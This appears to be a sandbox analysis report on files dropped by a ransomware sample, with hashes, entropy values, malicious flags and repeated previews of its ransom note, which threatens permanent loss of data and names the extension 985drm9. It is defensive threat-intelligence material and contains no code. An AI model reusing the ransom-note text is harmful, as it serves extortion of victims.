                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:true
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 32, image size 5242880, cbSize 5242934, bits offset 54
                            Category:dropped
                            Size (bytes):5242934
                            Entropy (8bit):5.58129212897705
                            Encrypted:false
                            SSDEEP:49152:5ZDTLcYuYc6kXnZV5n+eWdlXYf1aR/BtrQeSPR1MKvKymhp9uTs7xP:XT4lSBnYMhC6
                            MD5:702D90B44F32BEB8F4A846607F517EEB
                            SHA1:8F8388157C79492CB36BC943D25497C0AA92E1DB
                            SHA-256:CB7FC43EF60DEB88C8AE73BEB1F57AEBE98A3F9B0A99712A51406A07C64A0653
                            SHA-512:2F1A73B51C1E56DCF2FE5FED97C363DA0B8EF0AE883F55226DF485641B4DE2D07D8998B106E643FA7FEC1BF7E5D61E6D98C17801679D0046C36542CA5307D2AF
                            Malicious:false
                            Preview:BM6.P.....6...(............. .......P.........................6.......7...,...[...r...................k............... .......3...l...,...].......i..._...v...M...G...................d...........:...........s...t...b...p...y...b...#.......................t...9...4...G...........L...........N..................._...............L...........,...i.......S...................h...,.......I...&...............l...{...........*.........../.......L.......R...2...........!...............K...N...k.......................-.......^...........9...p...........}...............Z...&...<...................-...........b.......j..._...,...................w...x...U...................3.......Z...................2.......r.......Y...x...>.......+...H...Q...I...................?...Q...]...c...K...6...d.......?...............:.......Y...........;...U...Z...........c...v...........)...d.......|...0...............f...E..............._...8...x...........k...............,.......f.......K...Z...................5...F...g.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.852754651527773
                            Encrypted:false
                            SSDEEP:24:QYI7l9kJ1+44iSTjSjGazZCfASJ1dfpgFzVElGiQacm0/:QYlo4STqGazZFgpuz+lhQ60/
                            MD5:2B22D60315F459336A3F1BFA2D673654
                            SHA1:1FC48EBC9C352BD942B32CCA126A09D5AEA6AB0C
                            SHA-256:A78F58C7F99A3928FFE200A07E37C9D0DB3D5FC9EAC90CA48578BC78D441C2A9
                            SHA-512:E4175AA546488340C5E8F1E9E22412E5273AC7B3B108291B821057693E98385F658D3B89E0615A0537D12BF2EF5D1C5CCB246E30357AAC39495F0B35A2790CB4
                            Malicious:false
                            Preview:U]l.I......).=....._.j4#..L....q....(..v..`..S.7..t.1..a...t.....Z......J.....XZv.Djt..h.':..w....X.v..C...n|..^rR...~.em..'....y.L.y....z2..ZN...Rn...L$&.~i..@b...aK.>.IcG.4p..&!..=.iU!.w......`M.1...*I...J0~..1b.....i..v..A0hd.....w:D.E.'......:.@_...l*9M.xe..E.@.....)._.u.......j.|M|U.....3...D/|+..$b....$..Y.'uV...H..l...........G..-.9,F...g.,...,.=q._.W.Q..}.N2}S.&...R<.K..e...yo..g.gbw.&.'.p...}....|.X.;N..a../...4(kf.X.......;.)...!;.d..\.~...(v.>Q,.-.);7..Yc+.?B......P@.........}PD>OT2vpX..h.......8....g.|qh.IuvVy.X._j..A..Y........A....../g f^!}.....Lj...k1......>.5..(."r...9...6..o~I.H}.v$..........A....N{z.}g".w ..S...z.d|bt.U.~..|&A6...s..i.^u...6......#.g...v.....r..Q..^....8.!..%..h..=.....W...2.H.P.q|?.>.c.1.c...q.......2Kv...&..H.C[d..... .Et*.f.G......rf.`s.?...bzv...G.[..>.......]FvjMc...61.. ...s...K.....`.7...t[_............z-aU:soqB..C....g1.r8.3Z.Y.-...m.#...7..|.t...4k.m.......7.....dT).([L.d..Kq...E?.v&..&..lh..U..
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.8548881035155595
                            Encrypted:false
                            SSDEEP:24:OCgcTOdK0FDf0bU3cMxbg7AW+r77OoXevw2Fu4snfNZXazlGiQacmPN2M:rgcTQKGDKilbjF7OIow2FwfNZOlhQ6PP
                            MD5:0F675EE22503B39B6717C1E6D6BB7BD5
                            SHA1:C3941C48E3518D6C2B69D1295686102F9513470F
                            SHA-256:C6FA83F21C05075E3B1063E71B72B97C2AEC8E7C17764A1ED5D8D33AA7C153DC
                            SHA-512:459C3920A3153289914BA2E18FBA65C1403600C8ADE68F0AA5EA03940EEB5D795C16BC72C38312DDEFD9B26968ECCE04A30769C92EB646113FFA296B143EE0E1
                            Malicious:false
